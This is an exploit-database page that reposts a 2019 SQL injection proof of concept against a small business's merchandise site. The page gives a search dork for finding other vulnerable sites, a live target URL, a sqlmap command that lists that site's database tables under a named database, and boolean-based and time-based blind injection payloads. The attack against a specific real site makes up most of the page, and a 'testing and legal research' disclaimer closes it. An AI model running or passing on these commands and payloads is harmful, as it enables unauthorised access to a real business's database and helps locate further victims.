Advertisement






Big Daddy's Sauces SQL Injection

CVE Category Price Severity
N/A CWE-89 $5,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2019-05-19
CPE
cpe:cpe:/a:bigdaddy:sauces:1.0.0
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050197

Below is a copy:

Big Daddy's Sauces SQL Injection
# Exploit Title:Big Daddy's Sauces SQL Injection
# Date:18.05.2019
# Dork :intext:"Graphics by Kinkaid" id=
# Exploit Author:Cerkuday 
# Tested on:Windows &Kali Linux


#Demo:

http://www.bigdaddysassburn.com/merchandise/index.php?cat=10

# Poc:


sqlmap -u "http://www.bigdaddysassburn.com/merchandise/index.php?cat=10"  --random-agent -D bigdaddy_gkgwcm --tables

---
Parameter: cat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat=10 AND 6020=6020

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: cat=10 AND SLEEP(5)
---

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum